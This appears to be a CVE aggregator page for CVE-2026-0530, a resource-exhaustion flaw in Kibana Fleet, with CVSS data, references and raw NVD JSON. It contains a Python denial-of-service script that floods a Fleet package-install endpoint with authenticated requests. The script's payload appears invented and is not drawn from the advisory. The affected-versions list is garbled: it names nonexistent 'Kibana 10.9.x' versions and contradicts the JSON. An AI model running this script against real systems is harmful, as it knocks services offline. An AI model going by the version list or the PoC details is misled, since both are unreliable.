CVE-2026-0530

Description

Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted request. This causes the application to perform redundant processing operations that continuously consume system resources until service degradation or complete unavailability occurs.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE

Kibana 8.x < 8.19安全更新

Kibana 10.9.x < 10.9.2安全更新

Kibana 9.1.x < 9.1.10安全更新

Kibana 10.9.x < 10.9.1安全更新（部分版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

# CVE-2026-0530 PoC - Kibana Fleet Resource Exhaustion
# Target: Kibana Fleet API
# This PoC demonstrates sending crafted requests that trigger redundant processing

TARGET_HOST = "http://target-kibana:5601"
KIBANA_COOKIE = "your-auth-cookie-here"

def exploit_cve_2026_0530():
    """
    Send specially crafted requests to trigger resource exhaustion in Kibana Fleet
    The vulnerability allows redundant processing operations via crafted requests
    """
    headers = {
        "Cookie": KIBANA_COOKIE,
        "Content-Type": "application/json",
        "Kbn-xsrf": "true"
    }
    
    # Crafted request payload that triggers redundant processing
    # This exploits the lack of resource limits in Fleet package operations
    payload = {
        "packages": ["endpoint-protection"],
        "force": True,
        "ignore": ["validation", "compatibility"]
    }
    
    print("[*] Starting CVE-2026-0530 exploitation...")
    print("[*] Target: Kibana Fleet")
    print("[*] Sending crafted requests to trigger resource exhaustion")
    
    # Send multiple requests to exhaust resources
    for i in range(100):
        try:
            response = requests.post(
                f"{TARGET_HOST}/api/fleet/package_install",
                json=payload,
                headers=headers,
                timeout=30
            )
            print(f"[+] Request {i+1}/100 sent - Status: {response.status_code}")
            time.sleep(0.1)  # Minimal delay to send requests rapidly
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
    
    print("[*] Exploitation complete - System resources should be exhausted")

if __name__ == "__main__":
    exploit_cve_2026_0530()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0530
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0530
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0530/
[4] VulDB https://vuldb.com/cve/CVE-2026-0530
[5] https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-03/384521

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0530", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:50.817", "lastModified": "2026-01-22T19:58:42.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted request. This causes the application to perform redundant processing operations that continuously consume system resources until service degradation or complete unavailability occurs."}, {"lang": "es", "value": "Asignación de recursos sin límites ni limitación (CWE-770) en Kibana Fleet puede conducir a una asignación excesiva (CAPEC-130) a través de una solicitud especialmente diseñada. Esto provoca que la aplicación realice operaciones de procesamiento redundantes que consumen continuamente recursos del sistema hasta que se produzca la degradación del servicio o la indisponibilidad completa."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.10.0", "versionEndExcluding": "7.17.29", "matchCriteriaId": "1863989E-58AD-4481-B872-DF5AC637F854"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.19.10", "matchCriteriaId": "8707CF69-9922-490B-B64F-38F2D31E2CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.1.10", "matchCriteriaId": "FC3281ED-A331-43DC-9705-80A3FA3E6C75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.4", "matchCriteriaId": "8BF9D6AE-B07F-4516-A684-60B02BF731A0"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-03/384521", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}